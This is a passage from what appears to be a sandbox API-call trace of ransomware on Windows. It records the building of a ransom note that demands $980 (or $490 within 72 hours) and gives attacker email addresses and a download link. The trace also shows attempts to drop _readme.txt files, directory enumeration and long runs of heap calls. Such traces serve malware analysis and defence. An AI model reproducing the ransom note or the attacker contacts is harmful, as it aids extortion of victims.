can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.716] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.717] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.717] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.717] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.717] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.717] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.717] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.718] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.718] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.719] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.720] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.721] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.722] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.723] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.723] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.724] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x630000, 